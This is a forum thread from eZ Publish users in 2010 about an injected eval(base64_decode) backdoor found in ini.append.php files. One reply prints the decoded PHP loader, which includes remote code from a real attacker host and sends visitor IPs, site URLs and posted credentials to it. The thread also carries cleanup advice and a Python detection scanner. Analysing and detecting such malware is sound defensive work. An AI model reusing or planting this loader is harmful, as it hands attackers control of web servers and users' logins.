
Weird line in most of my ini.append.php


Softriva .com

Friday 02 April 2010 11:44:38 am

Hello,

This line appears in most of my ini.append.php files. What is it?

error_reporting(0);$p="bffjhzzazbzgf";eval(base64_decode("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"));


Robin Muilwijk

Friday 02 April 2010 1:08:44 pm

Hi,

Try an online base-64 decoder, you'll notice this is an encoded php script. Looks fishy to me to say the least...

Regards Robin

Board member, eZ Publish Community Project Board - Member of the share.ez.no team - Key values: Openness and Innovation.

LinkedIn: http://nl.linkedin.com/in/robinmuilwijk // Twitter: http://twitter.com/i_robin // Skype: robin.muilwijk

Paul Borgermans

Friday 02 April 2010 1:43:52 pm

Can you contact me: pb at ez dot no and send me one of those affected ini files?

Paul

eZ Publish, eZ Find, Solr expert consulting and training
http://twitter.com/paulborgermans

Kristof Coomans

Saturday 03 April 2010 12:26:53 am

Looks like a serious security breach in your INI file, if this piece of code does not occur inside comment blocks and if your ini.append.php files can be accessed directly over HTTP (if the proper rewrite rules are not in place).

That piece of code seems to include a script from an external site, so they can execute whatever PHP code they want. I recommend you remove all occurrences of such code immediately.

Script pasted below, with most base 64 encoded parts replaced with their decoded value.

class newhttp {
    var $fullurl;
    var $p_url;
    var $conn_id;
    var $flushed;
    var $mode = 4;
    var $defmode;
    var $redirects = 0;
    var $binary;
    var $options;
    var $stat = array('dev' => 0,'ino' => 0,'mode' => 0,'nlink' => 1,'uid' => 0,'gid' => 0,'rdev' => -1,'size' => 0,'atime' => 0,'mtime' => 0,'ctime' => 0,'blksize' => -1,'blocks' => 0);
    function error($msg='not connected') {
        if ($this->options & STREAM_REPORT_ERRORS) {
            trigger_error($msg, E_USER_WARNING);
        }
        return false;
    }
    function stream_open($path, $mode, $options, $opened_path) {
        $this->fullurl = $path;
        $this->options = $options;
        $this->defmode = $mode;
        $url = parse_url($path);
        if (empty($url['host'])) {
            return $this->error('missing host name');
        }
        $this->conn_id = fsockopen($url['host'], (empty($url['port']) ? 80 : intval($url['port'])), $errno, $errstr, 2);
        if (!$this->conn_id) {
            return false;
        }
        if (empty($url['path'])) {
            $url['path'] = '/';
        }
        $this->p_url = $url;
        $this->flushed = false;
        if ($mode[0] != 'r' || (strpos($mode, '+') !== false)) {
            $this->mode += 2;
        }
        $this->binary = (strpos($mode, 'b') !== false);
        $c = $this->context();
        if (!isset($c['method'])) {
            stream_context_set_option($this->context, 'http', 'method', 'GET');
        }
        if (!isset($c['header'])) {
            stream_context_set_option($this->context, 'http', 'header', '');
        }
        if (!isset($c['user_agent'])) {
            stream_context_set_option($this->context, 'http', 'user_agent', ini_get('user_agent'));
        }
        if (!isset($c['content'])) {
            stream_context_set_option($this->context, 'http', 'content', '');
        }
        if (!isset($c['max_redirects'])) {
            stream_context_set_option($this->context, 'http', 'max_redirects', 5);
        }
        return true;
    }
    function stream_close() {
        if ($this->conn_id) {
            fclose($this->conn_id);
            $this->conn_id = null;
        }
    }

    function stream_read($bytes) {
        if (!$this->conn_id) {
            return $this->error();
        }
        if (!$this->flushed && !$this->stream_flush()) {
            return false;
        }
        if (feof($this->conn_id)) {
            return '';
        }
        $bytes = max(1,$bytes);
        if ($this->binary) {
            return fread($this->conn_id, $bytes);
        } else {
            return fgets($this->conn_id, $bytes);
        }
    }

    function stream_write($data) {
        if (!$this->conn_id) {
            return $this->error();
        }
        if (!$this->mode & 2) {
            return $this->error('Stream is in read-only mode');
        }
        $c = $this->context();
        stream_context_set_option($this->context, 'http', 'method', (($this->defmode[0] == 'x') ? 'PUT' : 'POST'));
        if (stream_context_set_option($this->context, 'http', 'content', $c['content'].$data)) {
            return strlen($data);
        }
        return 0;
    }
    function stream_eof() {
        if (!$this->conn_id) {
            return true;
        }
        if (!$this->flushed) {
            return false;
        }
        return feof($this->conn_id);
    }
    function stream_seek($offset, $whence) {
        return false;
    }
    function stream_tell() {
        return 0;
    }
    function stream_flush() {
        if ($this->flushed) {
            return false;
        }
        if (!$this->conn_id) {
            return $this->error();
        }
        $c = $this->context();
        $this->flushed = true;
        $RequestHeaders = array($c['method'].' '.$this->p_url['path'].(empty($this->p_url['query']) ? '' : '?'.$this->p_url['query']).' HTTP/1.0', 'HOST: '.$this->p_url['host'], 'User-Agent: '.$c['user_agent'].' StreamReader' );
        if (!empty($c['header'])) {
            $RequestHeaders[] = $c['header'];
        }
        if (!empty($c['content'])) {
            if ($c['method'] == 'PUT') {
                $RequestHeaders[] = 'Content-Type: '.($this->binary ? 'application/octet-stream' : 'text/plain');
            } else {
                $RequestHeaders[] = 'Content-Type: application/x-www-form-urlencoded';
            }
            $RequestHeaders[] = 'Content-Length: '.strlen($c['content']);
        }
        $RequestHeaders[] = 'Connection: close';
        if (fwrite($this->conn_id, implode("\r\n", $RequestHeaders)."\r\n\r\n") === false) {
            return false;
        }
        if (!empty($c['content']) && fwrite($this->conn_id, $c['content']) === false) {
            return false;
        }
        global $http_response_header;
        $http_response_header = fgets($this->conn_id, 300);
        $data = rtrim($http_response_header);
        preg_match('#.* ([0-9]+) (.*)#i', $data, $head);
        if (($head[1] >= 301 && $head[1] <= 303) || $head[1] == 307) {
            $data = rtrim(fgets($this->conn_id, 300));
            while (!empty($data)) {
                if (strpos($data, 'Location: ') !== false) {
                    $new_location = trim(str_replace('Location: ', '', $data));
                    break;
                }
                $data = rtrim(fgets($this->conn_id, 300));
            }
            trigger_error($this->fullurl.' '.$head[2].': '.$new_location, E_USER_NOTICE);
            $this->stream_close();
            return ($c['max_redirects'] > $this->redirects++ && $this->stream_open($new_location, $this->defmode, $this->options, null) && $this->stream_flush());
        }
        $data = rtrim(fgets($this->conn_id, 1024));
        while (!empty($data)) {
            $http_response_header .= $data."\r\n";
            if (strpos($data,'Content-Length: ') !== false) {
                $this->stat['size'] = trim(str_replace('Content-Length: ', '', $data));
            } elseif (strpos($data,'Date: ') !== false) {
                $this->stat['atime'] = strtotime(str_replace('Date: ', '', $data));
            } elseif (strpos($data,'Last-Modified: ') !== false) {
                $this->stat['mtime'] = strtotime(str_replace('Last-Modified: ', '', $data));
            }
            $data = rtrim(fgets($this->conn_id, 1024));
        }
        if ($head[1] >= 400) {
            trigger_error($this->fullurl.' '.$head[2], E_USER_WARNING);
            return false;
        }
        if ($head[1] == 304) {
            trigger_error($this->fullurl.' '.$head[2], E_USER_NOTICE);
            return false;
        }
        return true;
    }
    function stream_stat() {
        $this->stream_flush();
        return $this->stat;
    }
    function dir_opendir($path, $options) {
        return false;
    }
    function dir_readdir() {
        return '';
    }
    function dir_rewinddir() {
        return '';
    }
    function dir_closedir() {
        return;
    }
    function url_stat($path, $flags) {
        return array();
    }
    function context() {
        if (!$this->context) {
            $this->context = stream_context_create();
        }
        $c = stream_context_get_options($this->context);
        return (isset($c['http']) ? $c['http'] : array());
    }
}
if (isset($_POST["l"]) and isset($_POST["p"])) {
    if(isset($_POST["input"])) {
        $user_auth="&l=".base64_encode($_POST["l"])."&p=".base64_encode(md5($_POST["p"]));
    }else {
        $user_auth="&l=".$_POST["l"]."&p=".$_POST["p"];
    }
}
else {
    $user_auth="";
}
if (!isset($_POST["log_flg"])) {
    $log_flg="&log";
}
$rkht=1;
if(version_compare(PHP_VERSION,'5.2','>=')) {
    if(ini_get('allow_url_include')) {
        $rkht=1;
    }else {
        $rkht=0;
    }
}

if($rkht==1) {
    if(ini_get('allow_url_fopen')) {
        $rkht=1;
    }else {
        $rkht=0;
    }
}

$v=$p.'.users.bishell.ru'."/?r_addr=".sprintf("%u", ip2long(getenv("REMOTE_ADDR")))."&url=".base64_encode($_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"]).$user_auth.$log_flg;
if($rkht==1) {
    if(!@include_once('http://'.$v)) {

    }
}
else {
    stream_wrapper_register('http2','newhttp');
    if(!@include_once('http://'.$v)) {

    }
}

independent eZ Publish developer and service provider | http://blog.coomanskristof.be | http://ezpedia.org
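As an added example (not code from this thread or from eZ Publish), a small Python scanner that looks for the injected line in the shape shown in the first post, decodes the base64 blob, flags the remote-include indicators that appear in Kristof's decoded loader, and records owner, mode and mtime of each hit so infected files can be correlated with write access. The sample tree, the $p value and the payload (pointing at example.invalid, not the real host) are constructed for the demo.

```python
import base64, os, re, stat, tempfile
from typing import Optional

# Shape of the injected line from the first post: error_reporting(0), a $p
# subdomain prefix, then eval(base64_decode("...")). Group 1 is the blob.
INJECT_RE = re.compile(r'error_reporting\(0\);\s*\$p\s*=\s*"[^"]*";\s*'
                       r'eval\(base64_decode\("([A-Za-z0-9+/=]+)"\)\)')
# Strings from the decoded loader above that mark a remote PHP include.
REMOTE_MARKERS = ("include_once('http://", "stream_wrapper_register(",
                  "allow_url_include")

def decode_payload(b64: str) -> str:
    """Decode the eval'd blob, re-padding in case '=' was stripped."""
    return base64.b64decode(b64 + "=" * (-len(b64) % 4)).decode("latin-1", "replace")

def scan_file(path: str) -> Optional[dict]:
    """Return a triage record if the file carries the injected line."""
    with open(path, "rb") as fh:
        text = fh.read().decode("latin-1")
    m = INJECT_RE.search(text)
    if m is None:
        return None
    payload = decode_payload(m.group(1))
    st = os.stat(path)  # owner/mode/mtime help correlate hits with write access
    return {"path": path, "line": text.count("\n", 0, m.start()) + 1,
            "markers": [k for k in REMOTE_MARKERS if k in payload],
            "mode": stat.filemode(st.st_mode), "uid": st.st_uid,
            "mtime": int(st.st_mtime)}

def scan_tree(root: str) -> list:
    """Walk root and collect a record for every infected .php file."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.endswith(".php"):
                rec = scan_file(os.path.join(dirpath, name))
                if rec:
                    hits.append(rec)
    return sorted(hits, key=lambda h: h["path"])

def build_sample_tree() -> str:
    """Constructed sample: one clean file and one carrying a benign stand-in
    payload (example.invalid, not the real host) in the thread's shape."""
    root = tempfile.mkdtemp(prefix="inisc_")
    os.makedirs(os.path.join(root, "settings", "override"))
    payload = "$v=$p.'.example.invalid';if(!@include_once('http://'.$v)){}"
    blob = base64.b64encode(payload.encode()).decode()
    bad = '<?php\nerror_reporting(0);$p="abcdef";eval(base64_decode("%s"));\n' % blob
    with open(os.path.join(root, "settings", "override", "site.ini.append.php"), "w") as fh:
        fh.write(bad)
    with open(os.path.join(root, "settings", "site.ini.append.php"), "w") as fh:
        fh.write("<?php /*\n[SiteSettings]\nSiteName=Test\n*/ ?>\n")
    return root
```

Point scan_tree() at the document root; each record names the file and line, which remote-include markers the decoded blob contains, and the owner, mode and mtime of the file.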

Bertrand Dunogier

Saturday 03 April 2010 1:57:50 am

wow... now this is a new one. Thank you Kristof for posting the decoded version.

There are a few results when looking for users.binshell.ru + either base64 or newhttp. One of them, quite well explained, even though in French, seems to link the issue to FCKEditor, which would make sense here: http://markup.fr/Exploitation-d-une-vulnerabilite-de-FCK-Editor-sur-markup-fr.

This will have to be investigated urgently.

Bertrand Dunogier
eZ Systems Engineering, Lyon
http://twitter.com/bdunogier
http://gplus.to/BertrandDunogier

Piotrek Karaś

Saturday 03 April 2010 4:04:34 am

Looks scary. One thing is what could happen if that piece of code was really malicious, the other thing, the really important one, is how it got there?...

--
Company: mediaSELF Sp. z o.o., http://www.mediaself.pl
eZ references: http://ez.no/partners/worldwide_partners/mediaself
eZ certified developer: http://ez.no/certification/verify/272585
eZ blog: http://ez.ryba.eu

zurgutt -

Saturday 03 April 2010 5:52:11 am

I have removed infections like that on three servers (not mine..). The probable source of infection each time was Joomla webs running under the same http user, so once it was broken all the php files on the server (many virtualhosts) were infected. Also, on two of them I discovered a further root level exploit and backdoors installed. One had the ssh server replaced with one that logged passwords.

My recommendation - get a new, clean server and restore webs to it from recent backup or if that is not possible, very very carefully clean everything. Take extra precautions when configuring new server - apache in suexec for each site, extra limitations for external execution and file open root for php etc.

Oh, and before you do anything else get the full backup of everything as it is at moment - remember someone is in control of it and can probably just rm -rf it all when he sees you are starting to fix it.

Certified eZ developer looking for projects.
zurgutt at gg.ee

Softriva .com

Saturday 03 April 2010 9:02:37 am

@PB

I will send you some of the files to your emails.

OOzy

Softriva .com

Saturday 03 April 2010 10:30:52 am

This may help.

We have sugarcrm in a directory in the ez root. We noticed that the sugarcrm is not working and it shows only a "White Blank Page". Two days later we noticed that our website is showing weird data.

Thank you

OOzy

Piotrek Karaś

Saturday 03 April 2010 12:03:44 pm

Were only INI files "infected" or other *.php files as well? Can you find a correlation between files affected and write permissions rather than just INI files? If so, the source could as well be "misplaced" ftp account access data (for example after a virus scanning e-mail messages), which actually once happened to one of our clients a few years back and they had some similar stuff attached to nearly all their files.

Looking forward to any news on whether this is eZ Publish dependent, which I don't really expect.

BTW. which version of eZ Publish is that?

Cheers,
Piotrek

--
Company: mediaSELF Sp. z o.o., http://www.mediaself.pl
eZ references: http://ez.no/partners/worldwide_partners/mediaself
eZ certified developer: http://ez.no/certification/verify/272585
eZ blog: http://ez.ryba.eu

Softriva .com

Saturday 03 April 2010 10:01:05 pm

Hello, how can I know if other php files were infected? I actually upgraded from 4.1.3 to 4.2.0 to 4.3.0. But there were other *.php files (not ez) in the same directory as the settings files, i.e. next to *.ini. I have already emailed Paul Borgermans a bunch of infected files for his review and investigation. I will also talk to my hosting company that I bought the server from and see if they do something, and I will keep ya posted.

Oozy
